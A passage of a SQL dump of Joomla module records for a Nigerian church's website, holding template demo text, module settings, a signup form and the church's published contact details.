(28, 277, 'Bottom B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>badge-primary bazinga</code></p>', 2, 'bottom-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"badge-primary bazinga\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(29, 278, 'Bottom B', '', 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>badge-success complete</code>', 3, 'bottom-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"badge-success complete\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(30, 279, 'Bottom B', '', 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>badge-danger stop</code>', 4, 'bottom-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"badge-danger stop\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(32, 355, 'Copyright info', '', '<p>Copyright © Life Oasis International Church. All rights reserved.</p>', 1, 'copyright', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(34, 270, 'Inner Bottom', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-lock</code></p>', 1, 'innerbottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-lock\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(35, 275, 'Inner Bottom', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-shopping-cart</code></p>', 2, 'innerbottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-shopping-cart\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(38, 205, 'Logo', '', '<p><img src=\"images/logo1a.png\" alt=\"\" width=\"281\" height=\"75\" /></p>', 1, 'logo', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(39, 191, 'Login', '', '', 1, 'menu', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_login', 1, 1, '{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"usetext\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"size-medium\",\"cache\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(40, 0, 'Search', '', '', 1, 'search', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_search', 1, 0, '{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"button_pos\":\"right\",\"imagebutton\":\"\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"324\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}', 0, '*'),
(41, 248, 'Sub Menu', '', '', 10, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"2\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(42, 240, 'Sidebar Menu', '', '', 2, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"sidebarmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}', 0, '*'),
(43, 243, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 9, 'sidebar-a', 196, '2017-08-12 15:22:15', '2017-08-12 15:22:41', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(44, 244, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 8, 'sidebar-a', 196, '2017-08-12 15:22:14', '2017-08-12 15:22:41', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(48, 253, 'Latest News', '', '', 15, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_articles_latest', 1, 1, '{\"catid\":[\"22\"],\"count\":\"5\",\"show_featured\":\"\",\"ordering\":\"p_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(49, 254, 'Login', '', '', 1, 'bottom-c', 196, '2017-05-03 03:05:58', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_login', 1, 1, '{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"profilelink\":\"0\",\"name\":\"0\",\"usesecure\":\"0\",\"usetext\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(50, 215, 'Live Streaming', '', '[video width=\"340\" height=\"200\" poster=\"images/demo/video/live_stream.png\"]\r\n[source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n[source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n[source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video]', 9, 'sidebar-b', 0, '0000-00-00 00:00:00', '2016-11-09 14:13:42', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(62, 0, 'Top A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 1, 'top-a', 0, '0000-00-00 00:00:00', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(63, 297, 'Top A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 2, 'top-a', 0, '0000-00-00 00:00:00', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(64, 298, 'Top A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 5, 'top-a', 0, '0000-00-00 00:00:00', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(65, 299, 'Top A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 6, 'top-a', 0, '0000-00-00 00:00:00', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(71, 268, 'White Block', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmodt ut labore et dolore magna aliqua. Module Class Suffix <code>mod-white</code></p>', 1, 'top-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"mod-white\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(72, 0, 'Color Block', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>mod-color</code></p>', 2, 'top-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"mod-color\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(73, 269, 'White Block', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmo ut labore et dolore magna aliqua. Module Class Suffix <code>mod-white</code></p>', 3, 'top-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"mod-white\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(74, 0, 'Dark Block', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>mod-dark</code></p>', 4, 'top-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"mod-dark\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(80, 0, 'Multilanguage status', '', '', 1, 'status', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_multilangstatus', 3, 1, '{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}', 1, '*'),
(81, 0, 'Joomla Version', '', '', 1, 'footer', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_version', 3, 1, '{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}', 1, '*'),
(95, 0, 'Bottom C', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<code></code></p>', 1, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(96, 0, 'Bottom C', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. <code></code></p>', 5, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(97, 0, 'Bottom C', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. <code></code></p>', 6, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(98, 0, 'Bottom C', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. <code></code></p>', 7, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(103, 241, 'Text Widget', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit</p>', 3, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colorbox\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(104, 242, 'Text Widget 2', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit</p>', 4, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(105, 238, '120 Converts', '', '<div class=\"text-center\">\r\n<h1 class=\"extra-large\">120</h1>\r\n<p>Number of converts who have come to Christ this month as a result of outreach ministries</p>\r\n<a class=\"button\" href=\"#\">Support ministry </a></div>', 15, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(106, 263, 'Text Widget 2', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit</p>', 19, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(129, 209, 'Free E-Books', '', '<p><a href=\"resources/blog/item/10-sensitivity\"><img src=\"images/baptism.png\" alt=\"\" /></a></p>', 3, 'top-a', 196, '2017-08-12 15:30:00', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(130, 210, 'Web Streaming', '', '<p><a href=\"resources/downloads?download=6:your-new-life\"><img src=\"images/new-life.png\" alt=\"\" /></a></p>', 4, 'top-a', 196, '2017-08-12 15:28:26', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(131, 223, 'podcast', '', '<p><a href=\"resources/blog/item/8-who-is-genuinely-saved\"><img src=\"images/salvation-2.png\" alt=\"\" /></a></p>', 7, 'top-a', 196, '2017-08-12 15:31:07', '2016-11-01 13:08:27', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(136, 294, 'Left Toolbar', '', '<p>Left toolbar position</p>', 1, 'toolbar-l', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(167, 0, 'Footer', '', '<p>This is the <code>footer</code> position. Lorem ipsum dolor sit amet sectetur adipiscing elit Donec sit amet nibh dolor vivamus non arcu sanctus est adipiscing elit Donec sit amet turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis</p>', 1, 'footer', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(168, 0, 'Newsletter', '', '<p>This is the newsletter position. Lorem ipsum dolor sit amet sectetur adipiscing elit</p>', 1, 'newsletter', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(172, 239, 'Contact Us', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(173, 225, 'Dream Centre Headquarters', '', '<p>Dream Centre Headquarters<br />Km. 4 Gbongan-Osogbo Express Way,<br />Dream Centre Bus stop. </p>\r\n<p>[list style=\"list-icons\"] [li icon=\"icon-phone\"] +2349090003891[/li] [li icon=\"icon-envelope-o\"] lifeoasis@hotmail.com[/li] [li icon=\"icon-map-marker\"] Osogbo, Nigeria[/li] [/list]</p>', 7, 'sidebar-a', 196, '2018-07-13 05:38:41', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(175, 0, 'Register Modal', '', '<h2 class=\"dotted\">Sign up and get 50% Discount</h2>\r\n<p>Thank you for your interest in our amazing product. Please leave us your email address and we\'ll send you all the information you need to get started.</p>\r\n<p> </p>\r\n<form id=\"landing-member\" action=\"#\" method=\"post\">[row][column one-third]<label id=\"sign_email_label\" for=\"sign_email\">Email Address</label>[/column][column two-fourths]<input id=\"sign_email\" class=\"inputbox expand\" type=\"email\" name=\"sign_email\" data-message=\"email address is required\" />[/column][/row]\r\n<p><button class=\"button-color right\" type=\"submit\">Sign me up</button></p>\r\n</form>', 1, 'reveal-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(206, 0, 'Home page slider', '', '', 1, 'slider', 0, '0000-00-00 00:00:00', '2016-11-01 13:09:53', '0000-00-00 00:00:00', 0, 'mod_widgetkit', 1, 0, '{\"widget_id\":\"9\",\"moduleclass_sfx\":\"\"}', 0, '*'),
(213, 218, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 14, 'sidebar-b', 196, '2017-08-12 15:22:06', '2017-08-12 15:22:41', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(214, 216, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 12, 'sidebar-b', 196, '2017-08-12 15:21:18', '2017-08-12 15:21:43', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(216, 235, 'Popup Widget', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit <code>modal-small</code></p>', 1, 'reveal-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"modal-small\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(218, 236, 'Popup Widget', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit <code>modal-large mod-dark</code></p>', 1, 'reveal-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"modal-large mod-dark\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
